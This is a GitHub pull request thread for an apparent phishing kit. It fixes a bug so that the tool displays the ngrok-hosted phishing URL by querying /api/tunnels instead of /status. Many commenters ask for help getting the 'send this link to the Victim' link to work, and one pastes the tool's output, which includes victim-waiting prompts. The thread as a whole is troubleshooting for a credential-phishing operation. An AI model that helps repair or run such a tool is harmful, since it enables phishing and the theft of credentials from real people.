Skip to content

Fixed "missing link" error#2

Open
CyberXCodder wants to merge 1 commit into
8L4NK:masterfrom
CyberXCodder:master
Open

Fixed "missing link" error#2
CyberXCodder wants to merge 1 commit into
8L4NK:masterfrom
CyberXCodder:master

Conversation

@CyberXCodder

@CyberXCodder CyberXCodder commented Apr 29, 2021

Copy link
Copy Markdown

The previous version has an error which doesn't show the phishing URL:

image

The reason for this is because ngrok html page has a different code than expected by curl, as seen in line 436:

link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9a-z]*\.ngrok.io")

When grep tries looking for the link, it can't be found in /status, thought it can be found in /api/tunnels as a plain text.
The fix was to change from /status to /api/tunnels, it should work properly now as shown below:

image

The previous version has an error which doesn't show the phishing URL. The reason for this was the Ngrok html page, which was built using purely javascript. Fixed it by changing the requests path from "/status" to "/api/tunnels". The code should show the phishing URL properly now.
@saroj-dev

Copy link
Copy Markdown

nice bro thanks for the help i had the same problem

@BlackLord1

Copy link
Copy Markdown

Hi.Can u help me to fix the error wich doesn't show the phishing URL?

@Believer2244

Believer2244 commented May 18, 2021 via email

Copy link
Copy Markdown

@Kuzenkkk

Copy link
Copy Markdown

Hi mate, can you explain me one thing, please? Why isn't it working while VPN is activated?

@frossokk

Copy link
Copy Markdown

hi i have a question how to edit this code and change it?

@Bepo128

Bepo128 commented Nov 4, 2022

Copy link
Copy Markdown

the error is still there...

@DocEmerald-dev DocEmerald-dev left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

for me its still not working

[] Choose an option: 1
[
] Downloading Ngrok...
[] Starting php server...
[
] Starting ngrok server...
[] Send this link to the Victim:
[
] Waiting victim open the link ...

@jacquezjones

Copy link
Copy Markdown

how do I update the code for it to show the link

@ADart12

ADart12 commented Feb 15, 2025

Copy link
Copy Markdown

still there is problem, it is not showing the URL if any one know please help me.

@llxst

llxst commented Feb 15, 2025

Copy link
Copy Markdown

bro pls fix this error

@llxst

llxst commented Feb 15, 2025

Copy link
Copy Markdown

@CyberXCodder

@Ahmad-Rana2

Copy link
Copy Markdown

Link Which it make cannot Work Any solution

@ShivoloMC

Copy link
Copy Markdown

anyone to pleaase help me here,
image
Screenshot 2025-03-20 103231

@ShivoloMC

Copy link
Copy Markdown

what is the username and password, it keeps prompting me for the username and password

@spandhare11

Copy link
Copy Markdown

still url issue don't solve .

@shotym3sa

Copy link
Copy Markdown

so has anyone figured out how to get the link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.